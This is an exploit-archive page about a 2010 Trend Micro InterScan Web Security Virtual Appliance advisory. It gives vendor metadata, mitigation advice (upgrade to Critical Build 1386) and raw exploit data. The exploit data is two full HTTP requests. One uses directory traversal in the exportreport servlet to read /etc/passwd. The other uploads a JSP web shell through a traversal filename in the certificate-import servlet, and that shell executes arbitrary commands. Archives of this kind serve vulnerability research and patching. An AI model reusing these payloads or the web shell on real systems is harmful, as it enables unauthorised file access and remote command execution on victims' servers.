header-logo
Suggest Exploit
vendor:
InterScan Web Security Virtual Appliance
by:
Unknown
7.5
CVSS
HIGH
Arbitrary File Download and Upload
Unknown
CWE
Product Name: InterScan Web Security Virtual Appliance
Affected Version From: Firmware versions prior to Trend Micro InterScan Web Security Virtual Appliance Critical Build 1386
Affected Version To: Unknown
Patch Exists: YES
Related CWE: Unknown
CPE: a:trend_micro:interscan_web_security_virtual_appliance
Metasploit:
Other Scripts:
Platforms Tested:
2010

Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities

Exploiting these issues can allow an attacker to download or upload arbitrary files to the system. This may aid in further attacks.

Mitigation:

Upgrade to Trend Micro InterScan Web Security Virtual Appliance Critical Build 1386 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41072/info

Trend Micro InterScan Web Security Virtual Appliance is prone to multiple vulnerabilities.

Exploiting these issues can allow an attacker to download or upload arbitrary files to the system. This may aid in further attacks.

Firmware versions prior to Trend Micro InterScan Web Security Virtual Appliance Critical Build 1386 are vulnerable.

==============================download==============================

POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1

Host: xxx.xxx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp

Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370

Content-Type: application/x-www-form-urlencoded

Content-Length: 99

 

op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443



==============================upload==============================

POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1

Host: xx.xx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://xx.xx.xx.xx:1812 

Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80

Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900

Content-Length: 2912

 

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="op"

save

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="defaultca"

yes

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

 

Content-Type: application/octet-stream

 

<%@ page import="java.util.*,java.io.*"%>

<%%>

<HTML><BODY>

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

        out.println("Command: " + request.getParameter("cmd") + "<BR>");

        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

        OutputStream os = p.getOutputStream();

        InputStream in = p.getInputStream();

        DataInputStream dis = new DataInputStream(in);

        String disr = dis.readLine();

        while ( disr != null ) {

                out.println(disr); 

                disr = dis.readLine(); 

                }

        }

%>

</pre>

</BODY></HTML>

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

 

<%@ page import="java.util.*,java.io.*"%>

<%%>

<HTML><BODY>

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

        out.println("Command: " + request.getParameter("cmd") + "<BR>");

        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

        OutputStream os = p.getOutputStream();

        InputStream in = p.getInputStream();

        DataInputStream dis = new DataInputStream(in);

        String disr = dis.readLine();

        while ( disr != null ) {

                out.println(disr); 

                disr = dis.readLine(); 

                }

        }

%>

</pre>

</BODY></HTML>

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="importca_passphrase"

 

test

 

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="importca_2passphrase"

test

-----------------------------80377104394420410598722900

Content-Disposition: form-data; name="beErrMsg"

imperr

-----------------------------80377104394420410598722900--

Navigation

Suggest Exploit

Services By CQR